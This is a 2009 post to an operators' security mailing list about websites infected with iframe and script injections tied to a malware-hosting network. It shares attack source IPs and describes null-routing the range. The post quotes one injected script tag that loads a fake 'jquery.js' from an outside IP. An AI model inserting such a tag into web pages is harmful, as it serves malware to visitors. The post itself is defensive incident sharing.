[nsp-sec] ATTN AS 12553 malware hosting
Kurt Jaeger
pi at nepustil.net
Thu Apr 16 10:02:48 EDT 2009
Hi!
> Mike Tancsa wrote:
>> Of our our customer Windows based websites was hacked (still looking for
>> the initial vector)...
[...]
>> <script src = //94.247.2.195 / jquery.js> </script>
>
> I realize that not everyone can just do this, but we null routed
> 94.247.2.0/23 at our exit/border routers a few months back.
More about this: Have a look at
http://blog.unmaskparasites.com/2009/04/15/malicious-income-iframes-from-cn-domains/
which describes those iframe infections.
We had a site (212.71.195.175) which was infected from
source 115.75.34.254 yesterday around 15:00 CEST (13:00 GMT).
Other sources of infection to site 87.230.6.28 on the 10th of
April, 10:15 CEST (8:15 GMT) (+/- 2 minutes) from those IPs:
210.6.236.247
114.74.136.204
81.232.58.36
24.19.235.28
24.202.225.222
79.3.5.143
71.76.217.33
87.118.145.32
68.59.151.107
69.242.102.223
24.185.148.255
75.143.154.18
69.133.110.146
98.193.205.11
FYI, maybe someone from you can track those hosts down.
--
MfG/Best regards, Kurt Jaeger 11 years to go !
Dr.-Ing. Nepustil & Co. GmbH fon +49 7123 93006-0 pi at nepustil.net
Rathausstr. 3 fax +49 7123 93006-99
72658 Bempflingen mob +49 171 3101372
More information about the nsp-security
mailing list